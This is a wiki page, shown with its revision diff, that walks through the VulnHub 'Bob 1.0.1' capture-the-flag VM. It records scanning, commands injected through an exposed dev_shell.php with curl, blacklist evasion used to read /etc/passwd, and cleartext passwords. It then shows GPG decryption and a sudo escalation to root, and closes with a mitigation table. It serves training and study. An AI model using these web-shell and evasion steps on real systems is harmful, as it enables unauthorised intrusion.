Difference between revisions of "Bob: 1.0.1 ~ Vulnhub - Walkthrough"
m (→Exploitation) |
m (→Objective) |
||
(5 intermediate revisions by the same user not shown) | |||
Line 1: | Line 1: | ||
== Objective == | == Objective == | ||
− | + | Acquire root access and get hold of the flag in / | |
Source: [[https://www.vulnhub.com/entry/bob-101,226/ VulnHub.com]] | Source: [[https://www.vulnhub.com/entry/bob-101,226/ VulnHub.com]] | ||
− | Status: [<span style="color: | + | Status: [<span style="color:green">Completed</span>] |
== Methodology == | == Methodology == | ||
Line 153: | Line 153: | ||
login.txt.gpg: GPG symmetrically encrypted data (AES cipher) | login.txt.gpg: GPG symmetrically encrypted data (AES cipher) | ||
</syntaxhighlight> | </syntaxhighlight> | ||
+ | Spent good hour poking around trying to find the right pass and then found this file. Well actually I found it earlier and opened it prob 5-6 times.. and then stared at it.. and then squinted.. and it's only when I executed that notes.sh script it hit me! | ||
+ | |||
+ | <syntaxhighlight lang=shell-session highlight="" line> | ||
+ | elliot@Milburg-High:/home/bob$ ./Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here/notes.sh | ||
+ | -= Notes =- | ||
+ | Harry Potter is my faviorite | ||
+ | Are you the real me? | ||
+ | Right, I'm ordering pizza this is going nowhere | ||
+ | People just don't get me | ||
+ | Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here> | ||
+ | Cucumber | ||
+ | Rest now your eyes are sleepy | ||
+ | Are you gonna stop reading this yet? | ||
+ | Time to fix the server | ||
+ | Everyone is annoying | ||
+ | Sticky notes gotta buy em | ||
+ | </syntaxhighlight> | ||
+ | ''''HARPOCRATES'''' | ||
+ | |||
+ | Let's test if it the right pass | ||
+ | <syntaxhighlight lang=shell-session highlight="6" line> | ||
+ | elliot@Milburg-High:/home/bob/Documents$ gpg --batch --passphrase HARPOCRATES -d login.txt.gpg | ||
+ | <g --batch --passphrase HARPOCRATES -d login.txt.gpg | ||
+ | gpg: keybox '/home/seb/.gnupg/pubring.kbx' created | ||
+ | gpg: AES encrypted data | ||
+ | gpg: encrypted with 1 passphrase | ||
+ | bob:b0bcat_ | ||
+ | </syntaxhighlight> | ||
+ | From here it's pretty much a wrap up | ||
+ | |||
+ | <syntaxhighlight lang=shell-session highlight="" line> | ||
+ | elliot@Milburg-High:/home/bob$ su bob | ||
+ | Password: | ||
+ | bob@Milburg-High:~$ sudo -l | ||
+ | [sudo] password for bob: | ||
+ | Matching Defaults entries for bob on localhost: | ||
+ | env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin | ||
+ | |||
+ | User bob may run the following commands on localhost: | ||
+ | (ALL : ALL) ALL | ||
+ | |||
+ | bob@Milburg-High:~$ sudo su - | ||
+ | |||
+ | root@Milburg-High:/# strings flag.txt | ||
+ | CONGRATS ON GAINING ROOT | ||
+ | .-. | ||
+ | ( ) | ||
+ | |~| _.--._ | ||
+ | |~|~:'--~' | | ||
+ | | | : #root | | ||
+ | | | : _.--._| | ||
+ | |~|~`'--~' | ||
+ | | | | ||
+ | | | | ||
+ | | | | ||
+ | | | | ||
+ | | | | ||
+ | | | | ||
+ | | | | ||
+ | | | | ||
+ | | | | ||
+ | _____|_|_________ Thanks for playing ~c0rruptedb1t | ||
+ | root@Milburg-High:/# | ||
+ | </syntaxhighlight> | ||
+ | == Final Notes == | ||
+ | Sometimes it is Ok to follow your gut feel and deviate from your own style (e.g. trying spawn a reverse shell) - fun things can be lying in plain view. | ||
+ | |||
+ | == Appendix A: Vulnerability Detail and Mitigation == | ||
+ | {| class="wikitable" style="background-color:#cccccc;color:black;font-size:0.9em;width:80%;" | ||
+ | |+ style="color:#e76700;text-align:left;" | Insufficiently Protected User Credentials | ||
+ | |- | ||
+ | |style="width:120px;" |Rating | ||
+ | |style="color:red;" | High | ||
+ | |- | ||
+ | |Description | ||
+ | |Copies of user passwords were found stored in clear-text files | ||
+ | |- | ||
+ | |Impact | ||
+ | |Taking over an account would allow perpetrator to access all privileges and functions granted to that account, including but not limited to access accessing restricted data and processes, running restricted programs, elevated access through sudo roles. | ||
+ | |- | ||
+ | |Remediation | ||
+ | |Put policies in place educating users about dangers of storing credentials in unprotected files. Establish a process to perform periodic system scans to detect such data. | ||
+ | |} |
Latest revision as of 06:48, 1 June 2018
Contents
Objective
Acquire root access and get hold of the flag in /
Source: [VulnHub.com]
Status: [Completed]
Methodology
Define our target
root@kali:# export TANGO=192.168.56.101
Discovery
root@kali:# nmap -O -p- -sT -sV -T5 -o nmap.txt $TANGO
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5b
80/tcp open http Apache httpd 2.4.25 ((Debian))
25468/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
MAC Address: 08:00:27:C0:CC:74 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Entry Point #1 - Port 80 (HTTP)
Enumeration
root@blaksec:~# nikto -h $TANGO
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 80
+ Start Time: 2018-05-24 18:19:38 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0x591 0x5669af30ee8f1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/dev_shell.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/lat_memo.html' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/passwords.html' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.html: Admin login page/section found.
+ 7539 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2018-05-24 18:19:49 (GMT-4) (11 seconds)
---------------------------------------------------------------------------
Let's take a closer look at that robots.txt
root@kali:~# curl http://$TANGO/robots.txt
User-agent: *
Disallow: /login.php
Disallow: /dev_shell.php
Disallow: /lat_memo.html
Disallow: /passwords.html
dev_shell.php sounds very promising. Dive dive dive!
Exploitation
After good 30 mins of poking it appeared there is some sort of blaklist - commands like ls, pwd, cat, nc are being blocked. Nothing we can't work around though - all we had to do is to replace ls with find, echo, dir, and cat with strings (see Exploiting web shells - working your way around blacklisted commands for more sweet workarounds).
Let's see what we have!
root@blaksec:~# curl -s -d "in_command=strings /etc/passwd" -X POST http://$TANGO/dev_shell.php
...
c0rruptedb1t:x:1000:1000:c0rruptedb1t,,,:/home/c0rruptedb1t:/bin/bash
bob:x:1001:1001:Bob,,,,Not the smartest person:/home/bob:/bin/bash
jc:x:1002:1002:James C,,,:/home/jc:/bin/bash
seb:x:1003:1003:Sebastian W,,,:/home/seb:/bin/bash
elliot:x:1004:1004:Elliot A,,,:/home/elliot:/bin/bash
sshd:x:116:65534::/run/sshd:/usr/sbin/nologin
proftpd:x:117:65534::/run/proftpd:/bin/false
ftp:x:118:65534::/srv/ftp:/bin/false
...
Looks like a few regular users on this host. Check them out
curl -s -d "in_command=find /home" -X POST http://$TANGO/dev_shell.php -o files_home.txt
Bunch of goodies turned up! For the most notable ones:
/home/seb/proftpd-1.3.3c
/home/bob/.old_passwordfile.html
/home/bob/Documents/Secret
/home/bob/Documents/Secret/Keep_Out
/home/bob/Documents/Secret/Keep_Out/Not_Porn
/home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here
/home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here/notes.sh
/home/bob/Documents/Secret/Keep_Out/Porn
/home/bob/Documents/Secret/Keep_Out/Porn/no_porn_4_u
/home/bob/Documents/staff.txt
/home/bob/Documents/login.txt.gpg
/home/bob/Downloads/Wheel_Of_Fortune.py
/home/bob/Downloads/Hello_Again.py
/home/elliot/theadminisdumb.txt
Quick look through the files... few quite interesting entries! The last one was fun to read - elliot b*ches and moans about admin bragging about his new password.. wait.. yei! we have a password!
root@blaksec:~# curl -s -d "in_command=strings /home/elliot/theadminisdumb.txt" -X POST http://$TANGO/dev_shell.php
...
theadminisdumb
...
Aaaaaand we're in!!!
# ssh elliot@$TANGO -p 25468
__ __ _ _ _ _____
| \/ (_) | | / ____|
| \ / |_| | |__ _ _ _ __ __ _ | (___ ___ _ ____ _____ _ __
| |\/| | | | '_ \| | | | '__/ _` | \___ \ / _ \ '__\ \ / / _ \ '__|
| | | | | | |_) | |_| | | | (_| | ____) | __/ | \ V / __/ |
|_| |_|_|_|_.__/ \__,_|_| \__, | |_____/ \___|_| \_/ \___|_|
__/ |
|___/
elliot@192.168.56.101's password:
Linux Milburg-High 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64
elliot@Milburg-High:~$
Poking around /home(s)... seb does not seem to have anything interesting and neither does jc. bob, however, is worth exploring!
elliot@Milburg-High:/home/bob$ cat .old_passwordfile.html
hey n there .old_passwordfile.html
elliot@Milburg-High:/home/bob$ alias
alias cat='echo hey \n there'
*** rolling my eyes ***
elliot@Milburg-High:/home/bob$ strings .old_passwordfile.html
<html>
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3
</p>
</html>
su'd to each of these users just to see if any interesting sudo roles but nothing fun there so back to bob!
elliot@Milburg-High:/home/bob/Documents$ file login.txt.gpg
file login.txt.gpg
login.txt.gpg: GPG symmetrically encrypted data (AES cipher)
Spent good hour poking around trying to find the right pass and then found this file. Well actually I found it earlier and opened it prob 5-6 times.. and then stared at it.. and then squinted.. and it's only when I executed that notes.sh script it hit me!
elliot@Milburg-High:/home/bob$ ./Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here/notes.sh
-= Notes =-
Harry Potter is my faviorite
Are you the real me?
Right, I'm ordering pizza this is going nowhere
People just don't get me
Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>
Cucumber
Rest now your eyes are sleepy
Are you gonna stop reading this yet?
Time to fix the server
Everyone is annoying
Sticky notes gotta buy em
'HARPOCRATES'
Let's test if it the right pass
elliot@Milburg-High:/home/bob/Documents$ gpg --batch --passphrase HARPOCRATES -d login.txt.gpg
<g --batch --passphrase HARPOCRATES -d login.txt.gpg
gpg: keybox '/home/seb/.gnupg/pubring.kbx' created
gpg: AES encrypted data
gpg: encrypted with 1 passphrase
bob:b0bcat_
From here it's pretty much a wrap up
elliot@Milburg-High:/home/bob$ su bob
Password:
bob@Milburg-High:~$ sudo -l
[sudo] password for bob:
Matching Defaults entries for bob on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User bob may run the following commands on localhost:
(ALL : ALL) ALL
bob@Milburg-High:~$ sudo su -
root@Milburg-High:/# strings flag.txt
CONGRATS ON GAINING ROOT
.-.
( )
|~| _.--._
|~|~:'--~' |
| | : #root |
| | : _.--._|
|~|~`'--~'
| |
| |
| |
| |
| |
| |
| |
| |
| |
_____|_|_________ Thanks for playing ~c0rruptedb1t
root@Milburg-High:/#
Final Notes
Sometimes it is Ok to follow your gut feel and deviate from your own style (e.g. trying spawn a reverse shell) - fun things can be lying in plain view.
Appendix A: Vulnerability Detail and Mitigation
Rating | High |
Description | Copies of user passwords were found stored in clear-text files |
Impact | Taking over an account would allow perpetrator to access all privileges and functions granted to that account, including but not limited to access accessing restricted data and processes, running restricted programs, elevated access through sudo roles. |
Remediation | Put policies in place educating users about dangers of storing credentials in unprotected files. Establish a process to perform periodic system scans to detect such data. |